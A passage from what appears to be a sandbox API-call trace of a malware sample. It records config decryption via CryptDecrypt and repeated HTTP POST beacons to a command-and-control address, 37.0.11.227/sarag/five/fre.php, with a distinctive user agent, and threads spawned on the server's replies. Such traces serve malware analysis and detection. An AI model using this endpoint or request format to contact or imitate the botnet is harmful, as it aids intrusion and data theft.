0x76b70000 [0313.541] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0313.549] GetProcessHeap () returned 0x690000 [0313.549] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0313.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.550] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0313.551] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.551] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0313.552] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.552] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0313.552] GetProcessHeap () returned 0x690000 [0313.553] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0313.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.554] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0314.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.122] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0314.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.124] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0314.136] GetProcessHeap () returned 0x690000 [0314.136] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0314.140] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.140] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0314.141] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.142] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0314.143] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.143] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0314.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.144] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0314.144] GetProcessHeap () returned 0x690000 [0314.144] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0314.206] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0314.207] GetProcessHeap () returned 0x690000 [0314.207] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0314.207] GetProcessHeap () returned 0x690000 [0314.208] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0314.208] GetProcessHeap () returned 0x690000 [0314.208] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0314.208] GetProcessHeap () returned 0x690000 [0314.208] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0314.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.209] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0314.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.223] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0314.233] GetProcessHeap () returned 0x690000 [0314.233] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0314.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.234] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0314.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.235] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0314.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.236] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0314.236] GetProcessHeap () returned 0x690000 [0314.236] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0314.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.237] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0314.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.238] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0314.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.239] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0314.239] GetProcessHeap () returned 0x690000 [0314.239] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0314.242] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.242] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0314.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.243] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0314.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.244] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0314.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.244] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0314.245] GetProcessHeap () returned 0x690000 [0314.245] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0314.245] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0314.245] GetProcessHeap () returned 0x690000 [0314.245] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0314.245] socket (af=2, type=1, protocol=6) returned 0xaa8 [0314.245] connect (s=0xaa8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0314.271] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0314.271] GetProcessHeap () returned 0x690000 [0314.271] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0314.271] GetProcessHeap () returned 0x690000 [0314.271] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0314.272] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0314.273] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0314.273] GetProcessHeap () returned 0x690000 [0314.273] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0314.273] GetProcessHeap () returned 0x690000 [0314.273] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0314.276] GetProcessHeap () returned 0x690000 [0314.276] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0314.276] GetProcessHeap () returned 0x690000 [0314.276] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0314.276] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0314.277] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0314.277] GetProcessHeap () returned 0x690000 [0314.277] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0314.277] GetProcessHeap () returned 0x690000 [0314.277] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0314.278] send (s=0xaa8, buf=0x6ad508*, len=242, flags=0) returned 242 [0314.278] send (s=0xaa8, buf=0x6aba40*, len=159, flags=0) returned 159 [0314.278] GetProcessHeap () returned 0x690000 [0314.278] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0314.278] recv (in: s=0xaa8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0314.356] GetProcessHeap () returned 0x690000 [0314.356] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0314.356] GetProcessHeap () returned 0x690000 [0314.357] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0314.357] GetProcessHeap () returned 0x690000 [0314.357] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0314.357] GetProcessHeap () returned 0x690000 [0314.358] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0314.358] closesocket (s=0xaa8) returned 0 [0314.358] GetProcessHeap () returned 0x690000 [0314.358] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0314.358] GetProcessHeap () returned 0x690000 [0314.359] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0314.359] GetProcessHeap () returned 0x690000 [0314.359] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0314.359] GetProcessHeap () returned 0x690000 [0314.360] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0314.360] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x167c) returned 0xaa8 [0314.361] Sleep (dwMilliseconds=0xea60) [0314.364] GetProcessHeap () returned 0x690000 [0314.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0314.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.365] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0314.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.389] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0314.399] GetProcessHeap () returned 0x690000 [0314.399] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0314.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.400] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0314.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.401] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0314.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.402] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0314.402] GetProcessHeap () returned 0x690000 [0314.403] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0314.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.404] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0314.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.404] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0314.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.405] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0314.405] GetProcessHeap () returned 0x690000 [0314.405] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0314.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.409] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0314.410] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.410] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0314.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.419] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0314.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.420] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0314.420] GetProcessHeap () returned 0x690000 [0314.420] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0314.420] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0314.420] GetProcessHeap () returned 0x690000 [0314.420] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0314.421] GetProcessHeap () returned 0x690000 [0314.421] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0314.421] GetProcessHeap () returned 0x690000 [0314.421] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0314.421] GetProcessHeap () returned 0x690000 [0314.421] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0314.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.422] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0314.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.430] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0314.436] GetProcessHeap () returned 0x690000 [0314.436] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0314.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.437] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0314.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.437] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0314.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.440] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0314.440] GetProcessHeap () returned 0x690000 [0314.441] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0314.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.442] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0314.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.443] CryptDestroyKey (hKey=0x69d628) returned 1 [0314.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.444] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0314.444] GetProcessHeap () returned 0x690000 [0314.444] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0314.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.445] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0314.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.445] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0314.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.446] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0314.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0314.447] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0314.447] GetProcessHeap () returned 0x690000 [0314.448] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0314.448] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0314.448] GetProcessHeap () returned 0x690000 [0314.448] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0314.448] socket (af=2, type=1, protocol=6) returned 0xaac [0314.452] connect (s=0xaac, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0314.481] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0314.481] GetProcessHeap () returned 0x690000 [0314.481] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0314.481] GetProcessHeap () returned 0x690000 [0314.481] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0314.481] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0314.484] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0314.484] GetProcessHeap () returned 0x690000 [0314.484] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0314.485] GetProcessHeap () returned 0x690000 [0314.485] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0314.485] GetProcessHeap () returned 0x690000 [0314.485] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0314.485] GetProcessHeap () returned 0x690000 [0314.485] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0314.486] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0314.487] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0314.487] GetProcessHeap () returned 0x690000 [0314.487] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0314.487] GetProcessHeap () returned 0x690000 [0314.487] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0314.488] send (s=0xaac, buf=0x6ad508*, len=242, flags=0) returned 242 [0314.488] send (s=0xaac, buf=0x6aba40*, len=159, flags=0) returned 159 [0314.488] GetProcessHeap () returned 0x690000 [0314.488] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0314.488] recv (in: s=0xaac, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0314.579] GetProcessHeap () returned 0x690000 [0314.580] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0314.580] GetProcessHeap () returned 0x690000 [0314.580] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0314.580] GetProcessHeap () returned 0x690000 [0314.584] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0314.584] GetProcessHeap () returned 0x690000 [0314.584] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0314.584] closesocket (s=0xaac) returned 0 [0314.585] GetProcessHeap () returned 0x690000 [0314.585] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0314.585] GetProcessHeap () returned 0x690000 [0314.585] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0314.586] GetProcessHeap () returned 0x690000 [0314.586] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0314.586] GetProcessHeap () returned 0x690000 [0314.586] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0314.587] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1770) returned 0xaac [0314.588] Sleep (dwMilliseconds=0xea60) [0314.589] GetProcessHeap () returned 0x690000 [0314.589] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0314.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.590] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0314.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.597] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0314.604] GetProcessHeap () returned 0x690000 [0314.604] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0314.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.605] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0314.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.606] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0314.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.607] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0314.607] GetProcessHeap () returned 0x690000 [0314.608] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0314.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0314.609] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, 